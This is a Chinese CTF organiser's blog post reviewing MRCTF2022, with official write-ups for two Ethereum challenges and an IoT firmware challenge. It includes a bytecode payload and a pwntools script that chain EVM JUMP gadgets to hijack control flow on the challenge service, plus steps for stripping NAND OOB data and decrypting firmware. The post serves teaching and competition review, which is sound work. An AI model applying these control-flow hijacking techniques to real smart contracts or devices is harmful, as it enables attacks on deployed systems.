默认分类

MRCTF2022 后记 & ETH IOT 官方题解 By Retr_0

总结

MRCTF2022 结束了,我想这次比赛对我们整个队伍是一个非常重要的活动,还记得2020年办第一次的时候 还是特别简单的赛题,当时记得 mcfx, p3,ha1这些正在成长中的大佬就来参加了比赛。当时对于MRCTF2020的定位还仅仅是一个校内赛,但是由于种种原因就办成了国内的一个比赛。又因为由于有“北邮”这个标签,第一次比赛也有很多人来参加。我们当时都还是19级、18级的刚刚打完校内 TSCTF-J的一群菜鸟,当时是希望能认识更多校内有相关兴趣的人。
现在想想还是应该感谢那次比赛,没有那次比赛可能我们的队伍会缺少:LLeaves、h0lyduck等等朋友们。

然后由于还没摸到进入正式比赛的门槛 我们还一直在各个比赛的初赛摸索。。。基本是进入不到线下赛,为了更多的参加比赛我们选择参加了 安恒月赛这种频率较高的比赛。当时有不少学长带我们参加这种级别的比赛,比如征哥、小泽哥等等 然后 Lord和几个我们天璇战队的也是基本场场参加。 总而言之就是慢慢能成功进入线下赛了。

后来转眼到了2021年,在年初其实就开始计划2021了,当时各个队员的水平也达到了一定程度。现在回想起来 当时的赛题在Pwn、密码以及Misc方向也算还能接受。为了彻底和 MRCTF2020 “划清界限” 。Eki就开始写平台了,平台效果非常好是根据我们之前参加的一个国外比赛弄得。然后赛题基本是由几个核心师傅出的,赛题不是特别多、质量在当时还算可以,前两天找到了另一个师傅的pwn wp,也属于是全网仅一份了。当时 coin,wjh几个大师傅来捧场了,密码还发现了一个隐藏的大哥 后来问他的时候 他表示只是个 国企“打工人”随便来玩玩 感觉还挺好的。总之还是知名度较低的一场比赛。在之后我们这批人基本也都进入了校队 做为主要梯队参加各个比赛了。然后发展各个学弟开始学习。

到2021年末的时候 也是机缘巧合结实了在微步工作的北邮学长。然后就准备和学校社团这边对接一些联合活动。或者一些校招实习绿卡等等。后来我们还想办MRCTF的时候就想到了 我们的这一合作伙伴。 他们也十分理解这一情况 非常支持我们办赛在假期回去前 还有几个师傅去微步公司和对接聊了很多,春节期间我们自己 完成了整个方案制订。并且我就提出是否能让微步也来出几道题给大家,让大家了解下真实的渗透场景以及工作是什么样的。

后来就是进行有条不紊的宣传、出题,这个时候我们的出题组达到了20+人,每个人都在自己比较擅长的领域给出了一些赛题。虽然说质量参差不齐,但我觉得从总体上我是非常满意的。尤其是看了他们写的wp之后也觉得这写题目也非常值得看一看。到了第一次宣传的时候 我就开始给各个比较熟悉的战队发邀请函, 非常感谢W&M、r4kapig及时捧场。同时也邀请了脑王@Nano 来参加比赛。Nano组建队伍之后,我就发现他的队伍有一个不太熟悉的ID,就去搜了下,结果发现竟然是高中时学OI的一个大佬学弟。目前已经在AAA参加比赛了。而我当时和AAA的各位大佬也不熟悉,就正好通过我的学弟邀请到了他所在的整个战队来参赛,在这里也非常感谢AAA的师傅们。

本来我们选择的比赛日还没有其他比赛安排,结果临近比赛日的时候就发现和其他比赛“撞车“了。不过还好还是有很多师傅来参加了。

后来开赛的时候就发现完全高看了平台的承受能力,上来排行榜炸了、平台由于带宽不够也炸了。然后就是扩容、不断地修平台。感谢两位运维师傅,本次比赛我个人觉得二进制的赛题是非常高质量的。 Pwn、Reverse 都是 几位师傅 花费很多心血出的,AAA的师傅实在是二进制方向的神,除去一道放题时间较晚的RE题,其他的二进制题全部完成 而且近似于都是一血(可能有2、3个不是)。最后以30+题目的完成度遥遥领先。W&M的师傅完成了所有的Web和微步特殊赛题。 在凌晨还在坚持解题。r4kapig的师傅在各个方向都有不错的成绩。

总的来说 也非常感谢来参加的其他队伍(排名不分前后):包括L、Vidar、CNSS、Lilac、天命、Nebula、D1n0、EDI、NGTM、Syclover、Xp0int、Sloth等等。

有着这样不错结果的同时我们也觉得有很多遗憾,比如还是参加的队伍比较少,排行榜上的变数并不是特别大,平台以及部分题目还是出现各种各样的问题。

不知道我个人还是否会继续参办组织明年的MRCTF,或者说我们也不知道是否还会有这么好的机会 以及 这么多的师傅来支持出题。不过我还是更希望能有一个更远的传承吧。

ETH

SandSandSand

这题其实本来想出EIP-2929那个特性的,不过想想算了 感觉大家都应该在虎符那道题学到了。所以出了一个简单题。(flag都懒得改了)

在staticcall revert 在正常call通过即可。

利用SSTORE或者其他的 selfdestruct等等均可。

Jop_Gadget

这道题其实算是出现了比较多的问题。因为所有的做这道题的师傅都来check我是如何将值PUSH进栈的,并且如何实现整个跳转结果的。

这就代表了我的题目描述不清,并且整个流程体系不清晰,没有给选手一个很好的感受。非常抱歉对于各位师傅造成的困扰。

这道题是我在学习JOP的时候,发现找gadget是一个比较麻烦的事情,是否能够实现一个快速找gadget的办法呢?因为其实虽然evm是变长指令,但是他没办法像rop那样实现比较特殊的将指令中间截断进行跳转。而且JUMP的目标需要为JUMPDEST否则就会Revert了。

但这道题其实没有多复杂,因为我意识到这其实是CTF比赛 也不是安全产品开发大赛,如果单纯就是那样做开发 找gadget去跳转就没意思了。所以我想到了赣网杯看到的那个字节码填空题,虽然我让你输入JUMP的地址,但是你可以在地址后多加字节码从而直接劫持控制流。当然这样这道题就变得简单起来了。
所以这里的输入被我操作了很多,于是我并没有直接提供源码,而是给出了报错信息,也是希望大家能多多fuzz(x 我出题时也准备在hint 以及题目描述中提供更多这方面的提示。
不过后来看到了Nano的一句话感觉学到很多:如果在出题的时候就已经想到了放hint,为什么不把他直接加到题目里。

整个题目主要就是有 PUSH、DUP、JUMPDEST、JUMP、MSTORE、RETURN 指令。

简单解

如果按照我上面所说的解法。那么这里的 exp就是:
0xdead600160805260206080f300
给出一个0xdead作为填充,然后后面直接加入要执行的shellcode劫持控制流。

稍微麻烦一点的

如果没有想到这一点,我们可以统计下给出的bytecode中的gadget,可以每一个生成的都有

JUMPDEST
MSTORE
JUMP
JUMPDEST
RETURN
STOP

这两个gadget。那么我们可以提前把所需要的值全部push进去。先跳转到MSTORE的gadget然后MSTORE,之后跳转到RETURN gadget将其返回。

我这里写出了一份exp:

from pwn import *
from pyevmasm import assemble_hex,disassemble_hex
import re
data1="""
JUMPDEST
MSTORE 
JUMP
"""
data2="""
JUMPDEST
RETURN
STOP
"""
p=remote("localhost",1337)
p.recvuntil(b"Input > ")
p.sendline(b'2')
temp=p.recvuntil(b"\n")[8:-1]
temps=temp.decode('utf-8')
MSTORE_GADGET=assemble_hex(data1)[2:]
RETURN_GADGET=assemble_hex(data2)[2:]
ms_addr=temps.find(MSTORE_GADGET)
RT_addr=temps.find(RETURN_GADGET)
print(MSTORE_GADGET)
print(RETURN_GADGET)
print(temps)
print(ms_addr,RT_addr)
print(temps[ms_addr:ms_addr+6],temps[RT_addr:RT_addr+6])
RTADDRESS=RT_addr/2
MS_ADDRESS=ms_addr/2
"""
PUSH2 0x01
PUSH2 0x80
MSTORE
PUSH2 0x20
PUSH2 0x80
RET STOP

PUSH2 0x20
PUSH2 0x80
PUSH2 JUMPGADGET_RET
PUSH2 0x01
PUSH2 0x80
PUSH2 RET gadget
"""
payload="0x0014,0x0065,"+"0x"+hex(int(RTADDRESS))[2:].rjust(4,'0')+",0x00ed,0x006d,"+"0x"+hex(int(MS_ADDRESS))[2:].rjust(4,'0')
print(payload)
p.recvuntil(b"INPUT YOUR JUMP:")
p.sendline(payload.encode('utf-8'))
p.interactive()

可以稳定获得flag。

IOT

同时IOT师傅的 简要题解也在我这里放了。

说在前面的话:
本题是受实际科研项目工作启发,附件均是出自实际设备。根据题目描述,是从编程器提取的固件中进行恢复,若能恢复出部分关键程序,分析其中的解密逻辑,即可对官网固件包进行解密。

  1. 根据.BIN文件名,有经验的(搜索)可以发现是海思某款芯片的型号。查datasheet

http://www.datasheetbank.com/datasheet-download/881341/1/Spansion/S34ML02G200BHI000

  1. Nand Flash分析最大的难点在于OOB及校验值的分析。这部分是如何组织的需要根据datasheet以及010 editor观察分析其中的规律。这里给个提示,可以看看一些特殊页的值猜测分析。
  2. 去除校验后,对固件进行重组,虽未能完整提取,但可提出ext2文件系统。
  3. 在其中搜索关键字符串,可定位到解密程序,进行逆向分析,可以轻松的发现具体解密逻辑。
  4. 知道解密逻辑后,对官网包进行解密,发现完整的文件系统。
    FLAG: MRCTF{N@nD_FL@SH_00B}

总结

这次比赛出的3道题还是比较一般 或者说有点失败,1个ETH太guessy,一个Misc前面的RTP考察的还是有一定意义的,但是后面的LSB感觉确实有点硬加的意思。或者说为了加一个难度吧,不过可能还是对我来说是一种全新的尝试,希望自己也能通过这次比赛学到一些东西,以后在设计赛题的时候避免这些问题。出一些高质量的题目

回复

  1. n7utb n7utb
    Chrome 100 10

    iot部分那个oob, 仔细对了data sheet和看了一些特殊页, 感觉oob应该就是2048bytes之后紧接着的128字节, 去除oob之后用binwalk -e还是提取不出完整的ext2, 请问是oob判断有问题还是 环境问题

This is just a placeholder img.